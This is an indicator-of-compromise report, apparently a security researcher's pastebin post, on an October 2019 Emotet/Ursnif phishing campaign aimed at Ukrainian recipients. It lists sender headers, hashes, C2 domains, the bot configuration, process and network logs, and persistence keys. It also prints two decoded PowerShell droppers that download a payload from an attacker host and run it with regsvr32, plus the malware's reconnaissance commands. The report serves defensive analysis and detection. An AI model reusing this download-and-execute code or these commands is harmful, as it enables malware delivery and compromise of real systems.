#emotet_ursnif_171019

#IOC #OptiData #VR #emotet_doc #ursnif_payload #W97M #PowerShell #ENC #inject

https://pastebin.com/1XfkVE5e

previous_contact: n/a

FAQ: https://radetskiy.wordpress.com/2018/04/03/ioc_ursnif_020418/

attack_vector
--------------
email attach .DOC > macro > b64 > powershell > GET bin > %user%\*.bin > %user%\appdata\roaming\microsoft\audizfwk\adsnwave.dll

email_headers
--------------
#1
Return-Path: <noreply@princefinance.princefamily33.com>
Received: from gateway36.websitewelcome.com (gateway36.websitewelcome.com [192.185.201.2])
Received: from cm14.websitewelcome.com (cm14.websitewelcome.com [100.42.49.7])
Received: from box5254.bluehost.com ([162.241.225.96])
Received: from [89.253.149.192] (port=53724 helo=5.61.57.146)
Subject: терміново
From: "Tetyana.Olekseevna@monolit.dn.ua" <noreply@princefinance.princefamily33.com>
Date: Thu, 17 Oct 2019 16:35:57 +0300
X-Source-IP: 89.253.149.192
X-Source-Sender: (5.61.57.146) [89.253.149.192]:53724
X-Source-Auth: noreply@princefinance.princefamily33.com

#2
Return-Path: <christina@princeonlinewebdesign.com>
Received: from gateway22.websitewelcome.com (gateway22.websitewelcome.com [192.185.46.142])
Received: from cm16.websitewelcome.com (cm16.websitewelcome.com [100.42.49.19])
Received: from box5254.bluehost.com ([162.241.225.96])
Received: from [178.75.241.39] (port=9647 helo=5.61.57.146)
Date: Thu, 17 Oct 2019 16:35:57 +0300
From: "Zoryana.Volodimirovna@topyachts.com.ua" <christina@princeonlinewebdesign.com>
Subject: Рахунок-Фактура №340
X-Source-IP: 178.75.241.39
X-Source-Sender: (5.61.57.146) [178.75.241.39]:9647
X-Source-Auth: christina@princeonlinewebdesign.com

#3
Return-Path: <betty@upstatehealthcareservices.com>
Received: from gproxy6-pub.mail.unifiedlayer.com (outbound-ss-348.hostmonster.com [74.220.202.212])
Received: from cmgw15.unifiedlayer.com (unknown [10.9.0.15])
Received: from box787.bluehost.com ([66.147.244.87])
Received: from [62.176.68.133] (port=61085 helo=5.61.57.146)
From: "Ivan.Volodimirovich@scalehobby.com.ua" <betty@upstatehealthcareservices.com>
Date: Thu, 17 Oct 2019 16:22:40 +0300
Subject: Рахунок за Газ №9282
X-Source-IP: 62.176.68.133
X-Source-Sender: (5.61.57.146) [62.176.68.133]:61085
X-Source-Auth: betty@upstatehealthcareservices.com

files
--------------
SHA-256		f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287
File name	rahunok#0027980.doc	[CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
File size	285 KB (291840 bytes)

SHA-256		3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087
File name	rahunok#0037239.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
File size	329.5 KB (337408 bytes)

SHA-256		e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b
File name	hfsjaoipqewfbwoei.bin (point.dll)	[PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit]
File size	1.1 MB (1150976 bytes)

activity
**************
PL_SCR			161.117.39.210		limitsno{.} at/hfsjaoipqewfbwoei.bin

C2			47.74.186.51		vip-statistic{.} at

+ @bomccss
#ursnif config
serpent_key: Dfei8OoQ0xhjTyql
botnet-id: 700
version: 217027

c2:
cxzko43pnr7ujnte[.]onion
vip-statistic[.]at
intrade-support[.]at
fresh-girls[.]at


netwrk
--------------
[ssl]
216.58.201.78	google.com		Client Hello

[http]
47.74.186.51		limitsno{.} at		GET /hfsjaoipqewfbwoei.bin 			HTTP/1.1 	noUA
47.74.186.51		vip-statistic{.} at	GET /images/NFVfNmnFntzllAW_2/..../P1.gif	HTTP/1.1 	Mozilla/4.0
47.74.186.51		vip-statistic{.} at	POST /images/ZP9eBpRUFTo1VIxz/.../C.bmp		HTTP/1.1 	Mozilla/4.0

comp
--------------
powershell.exe	2832	TCP	localhost	49168	47.74.186.51	80	ESTABLISHED
explorer.exe	1988	TCP	localhost	49169	216.58.201.78	443	ESTABLISHED
explorer.exe	1988	TCP	localhost	49170	216.58.201.68	443	ESTABLISHED
explorer.exe	1988	TCP	localhost	49171	47.74.186.51	80	ESTABLISHED
explorer.exe	1988	TCP	localhost	49172	5.61.57.146	80	ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enco (base64)
"C:\Windows\system32\regsvr32.exe" /s C:\Users\operator\nKUXcZ.bin
C:\Windows\system32\control.exe /?
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL /?

C:\Windows\system32\cmd.exe
cmd.exe /C "nslookup myip.opendns.com resolver1.opendns.com > C:\tmp\415B.bi1"
cmd /C "echo -------- >> C:\tmp\415B.bi1"
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

cmd /C "systeminfo.exe > C:\tmp\A13.bin1"
C:\Windows\system32\systeminfo.exe

cmd /C "net view >> C:\tmp\A13.bin1"
C:\Windows\system32\net.exe net  view

cmd /C "nslookup 127.0.0.1 >> C:\tmp\A13.bin1"
cmd /C "tasklist.exe /SVC >> C:\tmp\A13.bin1"

cmd /C "driverquery.exe >> C:\tmp\A13.bin1"
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\tmp\A13.bin1"

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run				18.10.2019 14:07

crypssec	Free Age	SportsSignup Meat
c:\users\operator\appdata\roaming\microsoft\audizfwk\adsnwave.dll	06.10.2019 13:51

@rundll32 "C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll",DllRegisterServer

drop
--------------
C:\Users\operator\nKUXcZ.bin
C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll
C:\tmp\A13.bin1		- zip _ extracted info !!!
C:\tmp\415B.bi1		- zip _ extracted info !!!
C:\tmp\D5D9.bin		- zip _ extracted info !!!
C:\tmp\422B.bin		- zip _ extracted info !!!
C:\tmp\2BF9.bin		- zip _ extracted info !!!
C:\tmp\4DC3.bin		- zip _ extracted info !!!
C:\tmp\3083.bin		- zip _ extracted info !!!

decoded b642powershell
--------------
#1
$yozninjdjc="wxvhw";
$kjqpsfw = "nKUXcZ";
$kyvisokdvpou="iisvbivwcdfv";
$bduhtq=$env:userprofile+"\"+$kjqpsfw+".bin";
$shofvhgo="hfaho";
$rwwci=&("new-object") net.webclient;
$mznbayyscbf="clmvzpwymfxtqyuuq";
$mtfyqp="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
$hxpdmkdtmrg="kclcrunb";
Function dwnld{
$ndrrgwesufj="bqdtsgtsy";
try{
$ubjlvybhksmvmqz="svebvywesqwpbtt";
$rwwci."DownloadFile"($mtfyqp, $bduhtq);
$nosvyxzfejquwqm="jaqaiyxlv";
If ((.("Get-Item") $bduhtq)."length" -ge 200000) {
$pnpeirog="kmcyuo";
$ugvjgt = Start-Process -FilePath "regsvr32.exe" -Args "/s $bduhtq" -Wait -NoNewWindow -PassThru;
$ksecir="jvnvnwurbfdxqygqf";
} else {
$mhmwvmqfuybxwur="drffczm";
dwnld;
$pemmvoigqmsza="jyeqziuppapb";
}
$cqhccbph="gvuz";
}catch{
$rcvwrhfjqqxxch="mqeezcoacfemgpkzkd";
dwnld;
$vwdggtfwd="ovjvyghtjfxrnktgt";
}}dwnld;
$zbadv="vccbbnzdpdyqgcv";

#2
$zhsiziqtdjjsyfye="nxoyyqtocw";
$mgvtio = "UJqEF";
$ithgawkqu="wgpqgqgnhjruhliad";
$yueeoa=$env:userprofile+"\"+$mgvtio+".bin";
$izbblp="zlzhdcptbhaunoglez";
$ngvqvqb=&("new-object") net.webclient;
$kltkpujnqzfofb="dzygqluhywhhvtx";
$nslldzj="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
$rbntzlbqkulv="vvrfbdvtoo";
Function dwnld{
$lazaxcmudbef="wzgiffoctszol";
try{
$wrqkxxidhtjrrcq="bviazvtzbmwpoiz";
$ngvqvqb."DownloadFile"($nslldzj, $yueeoa);
$wurllwckcoaobk="cwnwbf";
If ((.("Get-Item") $yueeoa)."length" -ge 200000) {
$quyqejvsjujj="mzoffmbtc";
$jdjpil = Start-Process -FilePath "regsvr32.exe" -Args "/s $yueeoa" -Wait -NoNewWindow -PassThru;
$gzvivurflv="koherilwrbkvczpi";
} else {
$ypcmgzp="zkupghelnqeegzm";
dwnld;
$zgxifpixbe="bwoffieyelusq";
}
$jbialh="huodfndgmg";
}catch{
$yjkwithuhhapy="ilcdki";
dwnld;
$xlgnju="gpstdwckvbm";
}}dwnld;
$gxpfk="ehxqxmwggmw";


# # #
https://www.virustotal.com/gui/file/f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287/details
https://www.virustotal.com/gui/file/3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087/details
https://www.virustotal.com/gui/file/e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b/details
https://analyze.intezer.com/#/analyses/4db134a6-ebba-4515-bb5e-1b6ef9ac81f1


VR

@